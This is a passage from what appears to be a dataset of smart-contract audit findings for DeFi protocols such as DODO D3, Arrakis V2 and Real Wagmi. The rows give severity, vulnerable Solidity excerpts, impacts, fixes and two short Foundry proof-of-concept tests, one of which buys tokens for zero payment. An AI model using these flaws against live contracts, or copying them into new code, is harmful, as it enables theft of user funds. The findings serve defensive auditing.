(balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n\\nWhen calculating the collateral and debt values, the value of the collateral is adjusted by the collateralWeight and debtWeight respectively. This can lead to a position in which the collateral ratio is less than 1e18, which incorrectly signals the pool has bad debt via the checkBadDebtAfterAccrue check.\\nExample:\\n```\\nAssume a pool has the following balances and debts:\\n\\nToken A - 100 borrows 125 balance\\nToken B - 100 borrows 80 balance\\n\\nPrice A = 1\\ncollateralWeightA = 0.8\\n\\nPrice B = 1\\ndebtWeightB = 1.2\\n\\ncollateral = 25 * 1 * 0.8 = 20\\ndebt = 20 * 1 * 1.2 = 24\\n\\ncollateralRatio = 20/24 = 0.83\\n```\\n\\nThe problem here is that there is no bad debt at all and it is still profitable to liquidate this pool, even with a discount:\\n```\\nExcessCollateral = 125 - 100 = 25\\n\\n25 * 1 * 0.95 [DISCOUNT] = 23.75\\n\\nExcessDebt = 100 - 80 = 20\\n\\n20 * 1 = 20\\n```\\n\\nThe issue with this is that once this check has been triggered, no other market participants besides DODO can liquidate this position. This creates a significant inefficiency in the market that can easily to real bad debt being created for the pool. This bad debt is harmful to both the pool MM, who could have been liquidated with remaining collateral, and also the vault LPs who directly pay for the bad debt.",The methodology of the bad debt check should be changed to remove collateral and debt weights to accurately indicate the presence of bad debt.,Unnecessary loss of funds to LPs and MMs,"```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n" +D3UserQuote#getUserQuote queries incorrect token for exchangeRate leading to inaccurate quota calculations,medium,"A small typo in the valuation loop of D3UserQuote#getUserQuote uses the wrong variable leading to and incorrect quota being returned. The purpose of a quota is to mitigate risk of positions being too large. This incorrect assumption can dramatically underestimate the quota leading to oversized (and overrisk) positions.\\nD3UserQuota.sol#L75-L84\\n```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n\\nD3UserQuota.sol#L80 incorrectly uses token rather than _token as it should. This returns the wrong exchange rate which can dramatically alter the perceived token balance as well as the calculated quota.",Change variable from token to _token:\\n```\\n- tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token));\\n+ tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(_token));\\n```\\n,"Quota is calculated incorrectly leading to overly risky positions, which in turn can cause loss to the system","```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n" +Calculation B0 meets devision 0 error when a token has small decimal and high price with a small kBid,medium,"Here is poc\\n```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = """";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n\\nIt will revert. In this example, wbtc price is 30445, and k = 0.0001, suppose maker contains rules, but model is invalid.","Fix formula for this corner case, like making temp2 = 1\\nImprove calculation accuracy by consistently using precision 18 for calculations and converting to real decimal when processing amounts.",Maker sets right parameters but traders can't swap. It will make swap model invalid.\\nTool Used\\nManual Review,"```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = """";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n" +"When swapping 18-decimal token to 8-decimal token , user could buy decimal-18-token with 0 amount of decimal-8-token",medium,"Here is the poc:\\n```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\n","In buyToken() of D3Trading.sol, add this rule:\\n```\\nif(payFromAmount == 0) { // value too small\\n payFromAmount = 1;\\n }\\n```\\n",It may cause unexpected loss\\nTool Used\\nManual Review,"```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\n" +ArrakisV2Router#addLiquidityPermit2 will strand ETH,high,"Inside ArrakisV2Router#addLiquidityPermit2, `isToken0Weth` is set incorrectly leading to the wrong amount of ETH being refunded to the user\\nArrakisV2Router.sol#L278-L298\\n```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n\\nAbove we see that excess msg.value is returned to the user at the end of the function. This uses the value of `isToken0Weth` to determine the amount to send back to the user. The issue is that `isToken0Weth` is set incorrectly and will lead to ETH being stranded in the contract. `isToken0Weth` is never set, it will always be `false`. This means that when WETH actually is token0 the incorrect amount of ETH will be sent back to the user.\\nThis same issue can also be used to steal the ETH left in the contract by a malicious user. To make matters worse, the attacker can manipulate the underlying pools to increase the amount of ETH left in the contract so they can steal even more.","Move `isToken0Weth` and set it correctly:\\n```\\n- bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n+ bool isToken0Weth = _isToken0Weth(address(token0), address(token1));\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n",ETH will be stranded in contract and stolen,"```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n" +Then getAmountsForDelta function at Underlying.sol is implemented incorrectly,medium,"The function `getAmountsForDelta()` at the `Underlying.sol` contract is used to compute the quantity of `token0` and `token1` to add to the position given a delta of liquidity. These quantities depend on the delta of liquidity, the current tick and the ticks of the range boundaries. Actually, `getAmountsForDelta()` uses the sqrt prices instead of the ticks, but they are equivalent since each tick represents a sqrt price.\\nThere exists 3 cases:\\nThe current tick is outside the range from the left, this means only `token0` should be added.\\nThe current tick is within the range, this means both `token0` and `token1` should be added.\\nThe current tick is outside the range from the right, this means only `token1` should be added.\\nThe issue on the implementation is on the first case, which is coded as follows:\\n```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n\\nThe implementation says that if the current price is equal to the price of the lower tick, it means that it is outside of the range and hence only `token0` should be added to the position.\\nBut for the UniswapV3 implementation, the current price must be lower in order to consider it outside:\\n```\\nif (_slot0.tick < params.tickLower) {\\n // current tick is below the passed range; liquidity can only become in range by crossing from left to\\n // right, when we'll need _more_ token0 (it's becoming more valuable) so user must provide it\\n amount0 = SqrtPriceMath.getAmount0Delta(\\n TickMath.getSqrtRatioAtTick(params.tickLower),\\n TickMath.getSqrtRatioAtTick(params.tickUpper),\\n params.liquidityDelta\\n );\\n}\\n```\\n\\nReference","Change from:\\n```\\n// @audit-issue Change <= to <.\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\n\\nto:\\n```\\nif (sqrtRatioX96 < sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\n","When the current price is equal to the left boundary of the range, the uniswap pool will request both `token0` and `token1`, but arrakis will only request from the user `token0` so the pool will lose some `token1` if it has enough to cover it.","```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n" +outdated variable is not effective to check price feed timeliness,medium,"In ChainlinkOraclePivot, it uses one `outdated` variable to check if the two price feeds are `outdated`. However, this is not effective because the price feeds have different update frequencies.\\nLet's have an example:\\nIn Polygon mainnet, ChainlinkOraclePivot uses two Chainlink price feeds: MATIC/ETH and ETH/USD.\\nWe can see that\\nIn function `_getLatestRoundData`, both price feeds use the same `outdated` variable.\\nIf we set the `outdated` variable to 27s, the priceFeedA will revert most of the time since it is too short for the 86400s heartbeat.\\nIf we set the `outdated` variable to 86400s, the priceFeedB can have a very `outdated` value without revert.\\n```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedA outdated.""\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed A call failed."");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedB outdated.""\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed B call failed."");\\n }\\n```\\n",Having two `outdated` values for each price feed A and B.,The `outdated` variable is not effective to check the timeliness of prices. It can allow stale prices in one price feed or always revert in another price feed.,"```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedA outdated.""\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed A call failed."");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedB outdated.""\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed B call failed."");\\n }\\n```\\n" +Update to `managerFeeBPS` applied to pending tokens yet to be claimed,medium,"A manager (malicious or not) can update the `managerFeeBPS` by calling `ArrakisV2.setManagerFeeBPS()`. The newly-updated `managerFeeBPS` will be retroactively applied to the pending fees yet to be claimed by the `ArrakisV2` contract.\\nWhenever UniV3 fees are collected (via `burn()` or rebalance()), the manager fees are applied to the received pending tokens.\\n```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n\\nSince the manager can update the `managerFeeBPS` whenever, this calculation can be altered to take up to 100% of the pending fees in favor of the manager.\\n```\\nfunction setManagerFeeBPS(uint16 managerFeeBPS_) external onlyManager {\\n require(managerFeeBPS_ <= 10000, ""MFO"");\\n managerFeeBPS = managerFeeBPS_;\\n emit LogSetManagerFeeBPS(managerFeeBPS_);\\n}\\n```\\n","Fees should be collected at the start of execution within the `setManagerFeeBPS()` function. This effectively checkpoints the fees properly, prior to updating the `managerFeeBPS` variable.",Manager's ability to intentionally or accidently steal pending fees owed to stakers,"```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n" +Wrong calculation of `tickCumulatives` due to hardcoded pool fees,high,"Wrong calculation of `tickCumulatives` due to hardcoded pool fees\\nReal Wagmi is using a hardcoded `500` fee to calculate the `amountOut` to check for slippage and revert if it was to high, or got less funds back than expected.\\n```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n\\nThere are several problems with the hardcoding of the `500` as the fee.\\nNot all tokens have `500` fee pools\\nThe swapping takes place in pools that don't have a `500` fee\\nThe `500` pool fee is not the optimal to fetch the `tickCumulatives` due to low volume\\nSpecially as they are deploying in so many secondary chains like Kava, this will be a big problem pretty much in every transaction over there.\\nIf any of those scenarios is given, `tickCumulatives` will be incorrectly calculated and it will set an incorrect slippage return.",Consider allowing the fees as an input and consider not even picking low TVL pools with no transations,Incorrect slippage calculation will increase the risk of `rebalanceAll()` rebalance getting rekt.,```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n +No slippage protection when withdrawing and providing liquidity in rebalanceAll,high,"When `rebalanceAll` is called, the liquidity is first withdrawn from the pools and then deposited to new positions. However, there is no slippage protection for these operations.\\nIn the `rebalanceAll` function, it first withdraws all liquidity from the pools and deposits all liquidity to new positions.\\n```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n\\n```\\n _deposit(reserve0, reserve1, _totalSupply, slots);\\n```\\n\\nHowever, there are no parameters for `amount0Min` and `amount1Min`, which are used to prevent slippage. These parameters should be checked to create slippage protections.\\nActually, they are implemented in the `deposit` and `withdraw` functions, but just not in the rebalanceAll function.",Implement slippage protection in rebalanceAll as suggested to avoid loss to the protocol.,The withdraw and provide liquidity operations in rebalanceAll are exposed to high slippage and could result in a loss for LPs of multipool.,"```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n" +Usage of `slot0` is extremely easy to manipulate,high,"Usage of `slot0` is extremely easy to manipulate\\nReal Wagmi is using `slot0` to calculate several variables in their codebase:\\nslot0 is the most recent data point and is therefore extremely easy to manipulate.\\nMultipool directly uses the token values returned by `getAmountsForLiquidity`\\n```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n\\nto calculate the reserves.\\n```\\n reserve0 += amount0;\\n reserve1 += amount1;\\n```\\n",To make any calculation use a TWAP instead of slot0.,Pool lp value can be manipulated and cause other users to receive less lp tokens.,"```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n" +"The `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contract",high,"The `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contract\\nIn Dispatcher contract, `_estimateWithdrawalLp` function returns the value of shares amount based on the average of ratios `amount0 / reserve0` and `amount1 / reserve1`.\\n```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n\\nFrom `Dispatcher.withdraw` and `Dispatcher.deposit` function, amount0 and amount1 will be the accumulated fees of users\\n```\\nuint256 lpAmount;\\n{\\n (uint256 fee0, uint256 fee1) = _calcFees(feesGrow, user);\\n lpAmount = _estimateWithdrawalLp(reserve0, reserve1, _totalSupply, fee0, fee1);\\n}\\nuser.shares -= lpAmount;\\n_withdrawFee(pool, lpAmount, reserve0, reserve1, _totalSupply, deviationBP);\\n```\\n\\nHowever, it is important to note that the values of reserve0 and reserve1 can fluctuate significantly. This is because the positions of the Multipool in UniSwapV3 pools (concentrated) are unstable on-chain, and they can change substantially as the state of the pools changes. As a result, the `_estimateWithdrawalLp` function might return a large value even for a small fee amount. This could potentially lead to reverting due to underflow in the deposit function (in cases where lpAmount > user.shares), or it could result in withdrawing a larger amount of Multipool LP than initially expected.\\nScenario:\\nTotal supply of Multipool is 1e18, and Alice has 1e16 (1%) LP amounts which deposited into Dispatcher contract.\\nAlice accrued fees = 200 USDC and 100 USDT\\nThe reserves of Multipool are 100,000 USDC and 100,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(0.2% + 0.1%) / 2 * totalSupply` = `0.15% * totalSupply` = 1.5e15 LP amounts\\nHowever, in some cases, UniSwapV3 pools may experience fluctuations, reserves of Multipool are 10,000 USDC and 190,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(2% + 0.052%) / 2 * totalSupply` = `1.026% * totalSupply` = 1.026e16 LP amounts This result is greater than LP amounts of Alice (1e16), leading to reverting by underflow in deposit/withdraw function of Dispatcher contract.",Shouldn't use the average ratio for calculation in_estimateWithdrawalLp function,"Users may face 2 potential issues when interacting with the Dispatcher contract.\\nThey might be unable to deposit/withdraw\\nSecondly, users could potentially lose significant incentives when depositing or withdrawing due to unexpected withdrawals of LP amounts for their fees.","```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n" +The deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check),medium,"The deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check)\\nthe protocol missing the DEADLINE check at all in logic.\\nthis is actually how uniswap implemented the Deadline, this protocol also need deadline check like this logic\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.","consider adding deadline check like in the functions like withdraw and deposit and all operations the point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n","The transaction can be pending in mempool for a long and the trading activity is very time senstive. Without deadline check, the trade transaction can be executed in a long time after the user submit the transaction, at that time, the trade can be done in a sub-optimal price, which harms user's position.\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.","```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n" +Lenders lose interests and pay deposit fees due to no slippage control,medium,"When a lender deposits quote tokens below the minimum of LUP(Lowest Utilization Price) and HTP(Highest Threshold Price), the deposits will not earn interest and will also be charged deposit fees, according to docs. 